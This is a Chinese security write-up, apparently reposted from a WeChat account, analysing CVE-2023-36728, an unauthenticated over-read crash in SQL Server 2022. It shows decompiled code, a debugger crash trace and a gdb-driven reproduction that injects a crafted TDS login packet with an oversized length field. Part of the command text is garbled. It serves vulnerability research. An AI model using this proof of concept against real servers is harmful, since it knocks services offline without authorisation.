Windows SQL Server 预身份验证溢出读取 (CVE-2023-36728)
2023年10月16日,这个是一个sql server的未认证远程dos的bug解析.
环境
SQL Server 版本:sql server 2022.160.4035.4
主机系统:windows 1809
漏洞
在文件sqllang.dll版本中2022.160.4035.4,功能CFedAuthFeatureExtension::ReadIDCRLToken:
v4 = 0;
if ( !*a3 )
{
*(_DWORD *)a4 = 9;
return 0i64;
}
v8 = a2 + 4;
len1 = *(unsigned int *)a2;
v10 = *a3 - 4;
if ( *a3 == 4 )
{
*(_DWORD *)a4 = 10;
}
else
{
*((_DWORD *)this + 28) = v10 - (len1 + 0x40);
if ( v10 >= (int)len1 + 0x40 )
{
_mm_lfence();
v11 = 2i64 * (((unsigned int)len1 >> 1) + 1);
if ( !is_mul_ok(((unsigned int)len1 >> 1) + 1, 2ui64) )
v11 = -1i64;
v12 = operator new[](v11, *((struct IMemObj **)this + 2), 1, "sql\ntdbms\tds\src\featureext.cpp", 1585, 3u);
*((_QWORD *)this + 7) = v12;
if ( v12 )
{
_mm_lfence();
memcpy_s(*((void *const *)this + 7), len1, v8, len1);
影响
崩溃堆栈跟踪
(168c.27a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
sqllang!memcpy+0x180:
00007ffd`78f382fc c4a17e6f6c02e0 vmovdqu ymm5,ymmword ptr [rdx+r8-20h] ds:000001c2`20ff9b3d=??
0:019> k
# Child-SP RetAddr Call Site
00 0000008f`407fe9e8 00007ffd`78f33493 sqllang!memcpy+0x180
01 0000008f`407fe9f0 00007ffd`79a99658 sqllang!memcpy_s+0x5e
02 0000008f`407fea20 00007ffd`79a99525 sqllang!CFedAuthFeatureExtension::ReadIDCRLToken+0xe6
03 0000008f`407fea80 00007ffd`78f955b9 sqllang!CFedAuthFeatureExtension::ParseFeatureData+0x245
04 0000008f`407fead0 00007ffd`78f93f6f sqllang!CPhysicalConnection::FParseFeatureExtension+0x29e
05 0000008f`407fec30 00007ffd`78f93c8e sqllang!CPhysicalConnection::FCreateLoginRec+0x6dd
06 0000008f`407feea0 00007ffd`78f93b0b sqllang!process_login+0x24e
07 0000008f`407fef40 00007ffd`78f46c30 sqllang!process_commands_internal+0x45b
08 0000008f`407ff080 00007ffd`7ef088db sqllang!process_messages+0x1e0
09 0000008f`407ff230 00007ffd`7ef09298 sqldk!SOS_Task::Param::Execute+0x232
0a 0000008f`407ff830 00007ffd`7ef08df4 sqldk!SOS_Scheduler::RunTask+0x182
0b 0000008f`407ff930 00007ffd`7ef28293 sqldk!SOS_Scheduler::ProcessTasks+0x344
0c 0000008f`407ffa80 00007ffd`7ef2833c sqldk!Worker::EntryPoint+0x2f9
0d 0000008f`407ffb60 00007ffd`7ef27f7f sqldk!ThreadScheduler::RunWorker+0xc
0e 0000008f`407ffb90 00007ffd`7ef27c65 sqldk!SystemThreadDispatcher::ProcessWorker+0x589
0f 0000008f`407ffc70 00007ffd`b8447e94 sqldk!SchedulerManager::ThreadEntryPoint+0x3cf
10 0000008f`407ffd80 00007ffd`babf7ad1 KERNEL32!BaseThreadInitThunk+0x14
11 0000008f`407ffdb0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:019> r
rax=000001c226000040 rbx=0000000000ccffff rcx=000001c226000040
rdx=000001c220329b5e rsi=000001c220329b5e rdi=0000000000ccffff
rip=00007ffd78f382fc rsp=0000008f407fe9e8 rbp=00000000ffffffff
r8=0000000000ccffff r9=000001c220ff9b5d r10=00007ffd78f30000
r11=0000008f407fe928 r12=0000000000000000 r13=000001c220329b5e
r14=0000000000ccffff r15=0000000000668000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
sqllang!memcpy+0x180:
00007ffd`78f382fc c4a17e6f6c02e0 vmovdqu ymm5,ymmword ptr [rdx+r8-20h] ds:000001c2`20ff9b3d=??
sudo rpm -i msodbcsql17-17.2.0.1-1.x86_64.rpm
sudo rpm -i mssql-tools-17.2.0.1-1.x86_64.rpm
"aabb" -P "a" gdb --args /opt/mssql-tools/bin/sqlcmd -S 192.168.150.141,50128 -G -C -U
b main
r
b send
c
Breakpoint 2, 0x00007ffff6b30be0 in send () from /lib64/libpthread.so.0
b SSL_write
disa 1 2
c
Breakpoint 3, 0x00007fffee1f5740 in SSL_write () from /lib64/libssl.so.10
set {char[241]}$rsi="x10x01x00xe5x00x00x00x00xddx00x00x00x04x00x00x74x00x10x00x00x00x00x00x07xbbxaax00x00x00x00x00x00xe0x03x00x10xf0x00x00x00x09x04x00x00x5ex00x0ax00x72x00x00x00x72x00x00x00x72x00x0cx00x8ax00x0fx00xd0x00x04x00x8ex00x0ex00xaax00x00x00xaax00x06x00x00xe0x4cx68x0dx9cxb6x00x00x00xb6x00x00x00xb6x00x00x00x00x00x00x00x54x00x65x00x73x00x74x00x43x00x6cx00x69x00x65x00x6ex00x74x00x50x00x79x00x54x00x65x00x73x00x74x00x43x00x6cx00x69x00x65x00x6ex00x74x00x31x00x39x00x32x00x2ex00x31x00x36x00x38x00x2ex00x31x00x35x00x30x00x2ex00x31x00x34x00x31x00x50x00x79x00x20x00x54x00x44x00x53x00x20x00x6cx00x69x00x62x00x72x00x61x00x72x00x79x00x6dx00x61x00x73x00x74x00x65x00x72x00xd4x00x00x00x02x04x00x00x00x00xffxffxcc"
set $rdx=0xE5
set $r12=0xe5
c
9.在 SQL Server 中,windbg:
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):Windows SQL Server 预身份验证溢出读取 (CVE-2023-36728)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论